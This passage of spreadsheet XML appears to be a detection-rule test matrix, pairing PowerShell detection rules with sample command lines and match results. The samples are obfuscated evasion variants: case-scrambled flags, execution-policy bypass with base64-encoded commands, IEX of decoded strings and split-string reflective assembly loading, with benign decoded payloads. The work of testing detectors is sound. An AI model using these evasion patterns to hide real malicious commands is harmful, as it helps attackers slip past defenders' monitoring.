      <c r="C1332" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1332" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1332" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1332" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1332" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1332" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1332" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1332" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1332" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1333" ht="15.75" customHeight="1" s="42">
      <c r="A1333" s="43" t="n"/>
      <c r="B1333" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1333" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1333" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1333" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1333" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1333" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1333" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1333" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1333" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1333" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1334" ht="15.75" customHeight="1" s="42">
      <c r="A1334" s="43" t="n"/>
      <c r="B1334" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1334" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1334" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1334" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaND "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1334" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1334" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1334" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1334" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1334" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1334" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1335" ht="15.75" customHeight="1" s="42">
      <c r="A1335" s="43" t="n"/>
      <c r="B1335" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1335" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1335" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1335" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1335" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1335" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1335" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1335" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1335" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1335" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1336" ht="15.75" customHeight="1" s="42">
      <c r="A1336" s="43" t="n"/>
      <c r="B1336" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1336" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1336" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1336" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -E aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1336" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1336" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1336" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1336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336" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1336" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1337" ht="15.75" customHeight="1" s="42">
      <c r="A1337" s="43" t="n"/>
      <c r="B1337" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1337" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1337" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1337" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1337" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1337" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1337" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1337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1337" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1337" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1338" ht="15.75" customHeight="1" s="42">
      <c r="A1338" s="43" t="n"/>
      <c r="B1338" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1338" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1338" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1338" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcuTiOnPOLIcY Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1338" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1338" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1338" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1338" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1338" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1338" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1339" ht="15.75" customHeight="1" s="42">
      <c r="A1339" s="43" t="n"/>
      <c r="B1339" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1339" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1339" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1339" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1339" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1339" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1339" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1339" s="43" t="n"/>
      <c r="J1339" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1339" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1340" ht="15.75" customHeight="1" s="42">
      <c r="A1340" s="43" t="n"/>
      <c r="B1340" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1340" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1340" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1340" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /E SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1340" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1340" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1340" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1340" s="43" t="n"/>
      <c r="J1340" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1340" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1341" ht="15.75" customHeight="1" s="42">
      <c r="A1341" s="43" t="n"/>
      <c r="B1341" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1341" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1341" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1341" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1341" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1341" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1341" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1341" s="43" t="n"/>
      <c r="J1341" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1341" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1342" ht="15.75" customHeight="1" s="42">
      <c r="A1342" s="43" t="n"/>
      <c r="B1342" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1342" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1342" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1342" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1342" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1342" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1342" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1342" s="43" t="n"/>
      <c r="J1342" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1342" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1343" ht="15.75" customHeight="1" s="42">
      <c r="A1343" s="43" t="n"/>
      <c r="B1343" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1343" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1343" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1343" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1343" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1343" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1343" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1343" s="43" t="n"/>
      <c r="J1343" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1343" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1344" ht="15.75" customHeight="1" s="42">
      <c r="A1344" s="43" t="n"/>
      <c r="B1344" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1344" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1344" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1344" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMand "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1344" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1344" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1344" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1344" s="43" t="n"/>
      <c r="J1344" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1344" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1345" ht="15.75" customHeight="1" s="42">
      <c r="A1345" s="43" t="n"/>
      <c r="B1345" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1345" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1345" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1345" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1345" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1345" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1345" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1345" s="43" t="n"/>
      <c r="J1345" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1345" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1346" ht="15.75" customHeight="1" s="42">
      <c r="A1346" s="43" t="n"/>
      <c r="B1346" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1346" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1346" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1346" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1346" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1346" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1346" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1346" s="43" t="n"/>
      <c r="J1346" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1346" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1347" ht="15.75" customHeight="1" s="42">
      <c r="A1347" s="43" t="n"/>
      <c r="B1347" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1347" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1347" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1347" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1347" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1347" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1347" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1347" s="43" t="n"/>
      <c r="J1347" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1347" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1348" ht="15.75" customHeight="1" s="42">
      <c r="A1348" s="43" t="n"/>
      <c r="B1348" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1348" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1348" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1348" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMManD "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1348" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1348" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1348" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1348" s="43" t="n"/>
      <c r="J1348" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1348" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1349" ht="15.75" customHeight="1" s="42">
      <c r="A1349" s="43" t="n"/>
      <c r="B1349" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1349" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1349" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1349" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1349" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1349" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1349" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1349" s="43" t="n"/>
      <c r="J1349" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1349" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1350" ht="15.75" customHeight="1" s="42">
      <c r="A1350" s="43" t="n"/>
      <c r="B1350" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1350" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1350" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1350" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1350" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1350" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1350" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1350" s="43" t="n"/>
      <c r="J1350" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1350" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1351" ht="15.75" customHeight="1" s="42">
      <c r="A1351" s="43" t="n"/>
      <c r="B1351" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1351" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1351" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1351" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1351" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1351" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1351" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1351" s="36" t="n"/>
      <c r="J1351" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1351" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1352" ht="15.75" customHeight="1" s="42">
      <c r="A1352" s="43" t="n"/>
      <c r="B1352" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1352" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1352" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1352" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1352" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1352" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1352" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1352" s="36" t="n"/>
      <c r="J1352" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1352" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1353" ht="15.75" customHeight="1" s="42">
      <c r="A1353" s="43" t="n"/>
      <c r="B1353" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1353" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1353" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1353" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1353" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1353" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1353" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1353" s="36" t="n"/>
      <c r="J1353" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1353" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1354" ht="15.75" customHeight="1" s="42">
      <c r="A1354" s="43" t="n"/>
      <c r="B1354" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1354" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1354" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1354" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commANd "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1354" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1354" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1354" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1354" s="43" t="n"/>
      <c r="J1354" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1354" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1355" ht="15.75" customHeight="1" s="42">
      <c r="A1355" s="43" t="n"/>
      <c r="B1355" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1355" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1355" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1355" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1355" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1355" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1355" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1355" s="43" t="n"/>
      <c r="J1355" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1355" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1356" ht="15.75" customHeight="1" s="42">
      <c r="A1356" s="43" t="n"/>
      <c r="B1356" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1356" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1356" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1356" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAND "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1356" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1356" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1356" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1356" s="36" t="n"/>
      <c r="J1356" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1356" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1357" ht="15.75" customHeight="1" s="42">
      <c r="A1357" s="43" t="n"/>
      <c r="B1357" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1357" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1357" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1357" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commAnD "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1357" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1357" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1357" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1357" s="36" t="n"/>
      <c r="J1357" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1357" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1358" ht="15.75" customHeight="1" s="42">
      <c r="A1358" s="43" t="n"/>
      <c r="B1358" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1358" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1358" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1358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358" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1358" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1358" s="36" t="b">
        <v>0</v>
      </c>
